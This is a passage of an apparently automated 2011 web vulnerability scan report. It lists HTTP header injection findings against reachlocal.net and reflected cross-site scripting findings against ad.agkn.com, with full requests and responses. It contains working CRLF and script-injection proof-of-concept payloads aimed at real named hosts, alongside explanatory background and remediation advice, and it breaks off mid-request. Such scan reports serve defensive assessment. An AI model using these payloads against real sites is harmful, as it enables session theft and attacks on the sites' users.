Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3b074
e845103065b/partner-logo ...[SNIP]...
1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://utdi.reachlocal.net |
Path: |
/images/partner-logos-sonexis.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d9d65%0d%0a27fb644bc97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d9d65%0d%0a27fb644bc97/partner-logos-sonexis.jpg HTTP/1.1 Host: utdi.reachlocal.net Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.net/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 11:53:17 GMT Server: Apache Location: http://utdi.com/d9d65 27fb644bc97/partner-logos-sonexis.jpg Vary: Accept-Encoding Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:10 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/d9d65 27fb644bc97/partner-logo ...[SNIP]...
1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/productpic_avaya1.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 36765%0d%0acd72234d30c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /36765%0d%0acd72234d30c/productpic_avaya1.jpg HTTP/1.1 Host: utdi.reachlocal.net Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.net/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 11:53:01 GMT Server: Apache Location: http://utdi.com/36765 cd72234d30c/productpic_avaya1.jpg Vary: Accept-Encoding Content-Length: 309 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/36765 cd72234d30c/productpic_a ...[SNIP]...
1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/spacer.gif
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d288a%0d%0a00c7c1b4fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d288a%0d%0a00c7c1b4fe2/spacer.gif HTTP/1.1 Host: utdi.reachlocal.net Proxy-Connection: keep-alive Referer: http://utdi.reachlocal.net/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 11:52:49 GMT Server: Apache Location: http://utdi.com/d288a 00c7c1b4fe2/spacer.gif Vary: Accept-Encoding Content-Length: 298 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/d288a 00c7c1b4fe2/spacer.gif"> ...[SNIP]...
2. Cross-site scripting (reflected)
There are 135 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1129!
Issue detail
The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1329d"><script>alert(1)</script>68ab14b7166 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:53 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNKBAAAAAAkBArwBATUBC%2FABoAADAUIBBQABQwEFAAFBAQUAAQK8fhdn5xh1LAY%2FAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:53 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=462918736?imid=1686570677704590911&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons ...[SNIP]...
2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1129!
Issue detail
The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3783"><script>alert(1)</script>e292a848299 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect= HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNKCAAAAAA0BArwBATUBC%2FAB4AADAUIBBwABQwEHAAFBAQcAAQK8fhIojCjOb%2FrIAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect=http://ad.agkn.com/interaction!che=83841845?imid=1308449798641154760&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product- ...[SNIP]...
2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1129!
Issue detail
The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4a4"><script>alert(1)</script>52debf145d7 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect= HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNKCAAAAAAsBArwBATUBC%2FABwAADAUIBBgABQwEGAAFBAQYAAQK8fniLvnViAKPrAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=2040497228?imid=8686245717678793707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/ ...[SNIP]...
2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1129!
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b84a"><script>alert(1)</script>edb5176eb5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1 HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNKDAAAAABEBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjH%2FMgJ0ufACAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1http://ad.agkn.com/interaction!che=1716110508?imid=3602653213049352194&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se ...[SNIP]...
2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.agkn.com
Path: /iframe!t=1129!
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf115"%3balert(1)//760f2f14d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf115";alert(1)//760f2f14d5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115"%3balert(1)//760f2f14d5b=1 HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) 